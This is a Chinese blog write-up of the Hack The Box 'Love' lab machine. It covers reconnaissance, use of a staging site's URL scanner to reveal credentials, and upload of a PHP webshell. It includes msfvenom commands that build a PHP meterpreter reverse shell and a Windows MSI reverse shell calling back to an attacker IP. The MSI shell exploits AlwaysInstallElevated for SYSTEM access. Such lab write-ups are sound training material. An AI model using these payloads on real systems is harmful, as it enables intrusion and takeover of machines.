Hack the Box Love 靶机渗透

Love 靶机渗透

目标:得到root权限,取得user.txt,root.txt
作者:shadow
时间:2021-07-23

请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

打开80端口发现登录页面,暂时不尝试爆破,打开https看看

重新扫描443端口

 修改hosts文件指定这两个域名解析的IP为靶场的IP 10.10.10.239

echo "10.10.10.239 love.htb staging.love.htb" >> /etc/hosts

二、web渗透

访问staging.love.htb

 查看demo提示我们输入要扫描得网址,我们尝试nmap扫描出的5000端口

 扫描出vote用户名及密码

尝试登录80端口vote(此处卡了好久,一直密码错误,查资料后才知道)

https://www.sourcecodester.com/php/12306/voting-system-using-php.html

登录love.htb/admin

成功登录后台

发现可以上传文件,制作木马上传

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f raw > shell.php

 启动msf监听并访问木马http://love.htb/images/shell.php

成功反弹shell

 

成功取得user.txt

三、提权

查阅资料:找到alwaysinstallelevated,即当注册表中的alwaysinstallelevated设置为1时,机器上运行任何的msi程序,均会以system权限执行,该系统存在此漏洞

生产msi木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4445 -f msi > shell.msi

开启msf监听4445端口

 成功提权获得root.txt

四、总结

windows靶机做的比较少,查找漏洞时需要查看很多资料比如本次得alwaysinstallelevated,还有4台靶机没有整理,明天继续整理,晚安!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值